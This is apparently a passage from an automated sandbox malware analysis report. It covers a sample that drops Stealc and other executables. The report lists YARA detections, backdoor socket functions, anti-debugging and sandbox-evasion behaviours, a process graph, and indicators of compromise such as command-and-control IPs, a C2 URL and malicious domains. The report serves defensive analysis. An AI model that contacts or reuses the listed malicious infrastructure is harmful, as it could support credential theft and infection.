0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 84d280a9e8.exe Binary or memory string: WIN_XPe
Source: 84d280a9e8.exe Binary or memory string: WIN_VISTA
Source: 84d280a9e8.exe Binary or memory string: WIN_7
Source: 84d280a9e8.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2951418045.0000000001088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000004E.00000002.2953026392.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 84d280a9e8.exe PID: 7884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 84d280a9e8.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 84d280a9e8.exe PID: 5996, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 20.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.2430826993.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2630993454.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000000.2616219253.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2442182169.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: num.exe PID: 2488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BA1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 6_2_00BA1204
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BA1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_00BA1806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527565 Sample: 8ObkdHP9Hq.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 90 sergei-esenin.com 2->90 92 licendfilteo.site 2->92 94 8 other IPs or domains 2->94 116 Multi AV Scanner detection for domain / URL 2->116 118 Suricata IDS alerts for network traffic 2->118 120 Found malware configuration 2->120 122 18 other signatures 2->122 9 skotes.exe 3 22 2->9         started        14 8ObkdHP9Hq.exe 5 2->14         started        16 84d280a9e8.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 106 185.215.113.43, 49788, 49804, 49836 WHOLESALECONNECTIONSNL Portugal 9->106 108 185.215.113.103, 49810, 49842, 49879 WHOLESALECONNECTIONSNL Portugal 9->108 78 C:\Users\user\AppData\...\9d7da53f74.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->80 dropped 82 C:\Users\user\AppData\...\84d280a9e8.exe, PE32 9->82 dropped 88 3 other malicious files 9->88 dropped 150 Creates multiple autostart registry keys 9->150 152 Hides threads from debuggers 9->152 154 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->154 20 9d7da53f74.exe 9->20         started        24 84d280a9e8.exe 9->24         started        26 num.exe 13 9->26         started        84 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->84 dropped 86 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->86 dropped 156 Detected unpacking (changes PE section rights) 14->156 158 Tries to evade debugger and weak emulator (self modifying code) 14->158 160 Tries to detect virtualization through RDTSC time measurements 14->160 28 skotes.exe 14->28         started        162 Binary is likely a compiled AutoIt script file 16->162 164 Excessive usage of taskkill to terminate processes 16->164 30 taskkill.exe 16->30         started        32 taskkill.exe 16->32         started        34 taskkill.exe 16->34         started        38 20 other processes 16->38 166 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->166 36 taskkill.exe 18->36         started        file6 signatures7 process8 dnsIp9 96 sergei-esenin.com 104.21.53.8, 443, 61043, 61190 CLOUDFLARENETUS United States 20->96 98 steamcommunity.com 104.102.49.254, 443, 61026, 61176 AKAMAI-ASUS United States 20->98 124 Antivirus detection for dropped file 20->124 126 Multi AV Scanner detection for dropped file 20->126 128 Detected unpacking (changes PE section rights) 20->128 148 3 other signatures 20->148 130 Binary is likely a compiled AutoIt script file 24->130 132 Found API chain indicative of sandbox detection 24->132 134 Excessive usage of taskkill to terminate processes 24->134 40 chrome.exe 24->40         started        43 taskkill.exe 1 24->43         started        45 taskkill.exe 1 24->45         started        55 3 other processes 24->55 100 185.215.113.37, 49854, 61131, 61184 WHOLESALECONNECTIONSNL Portugal 26->100 136 Found evasive API chain (may stop execution after checking locale) 26->136 138 Searches for specific processes (likely to inject) 26->138 140 Machine Learning detection for dropped file 28->140 142 Tries to evade debugger and weak emulator (self modifying code) 28->142 144 Hides threads from debuggers 28->144 146 Potentially malicious time measurement code found 28->146 47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        53 conhost.exe 36->53         started        57 20 other processes 38->57 signatures10 process11 dnsIp12 102 192.168.2.4, 138, 443, 49186 unknown unknown 40->102 104 239.255.255.250 unknown Reserved 40->104 59 chrome.exe 40->59         started        62 chrome.exe 40->62         started        64 chrome.exe 40->64         started        76 4 other processes 40->76 66 conhost.exe 43->66         started        68 conhost.exe 45->68         started        70 conhost.exe 55->70         started        72 conhost.exe 55->72         started        74 conhost.exe 55->74         started        process13 dnsIp14 110 youtube-ui.l.google.com 142.250.181.238, 443, 49860 GOOGLEUS United States 59->110 112 www.google.com 142.250.184.228, 443, 49886 GOOGLEUS United States 59->112 114 5 other IPs or domains 59->114
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.16.206
 play.google.com United States
15169 GOOGLEUS false
142.250.181.238
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.185.142
 youtube.com United States
15169 GOOGLEUS false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS false
142.250.184.238
 www3.l.google.com United States
15169 GOOGLEUS false
142.250.184.228
 www.google.com United States
15169 GOOGLEUS false
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Private

IP
192.168.2.4

Contacted Domains

Name IP Active
youtube-ui.l.google.com 142.250.181.238 true
steamcommunity.com 104.102.49.254 true
www3.l.google.com 142.250.184.238 true
play.google.com 172.217.16.206 true
www.google.com 142.250.184.228 true
sergei-esenin.com 104.21.53.8 true
youtube.com 142.250.185.142 true
bathdoomgaz.store unknown unknown
spirittunek.store unknown unknown
licendfilteo.site unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
eaglepawnoy.store unknown unknown
accounts.youtube.com unknown unknown
www.youtube.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.43/Zu7JuNko/index.php true unknown
https://steamcommunity.com/profiles/76561199724331900 true
  • URL Reputation: malware
 unknown
http://185.215.113.37/ true
  • URL Reputation: malware
 unknown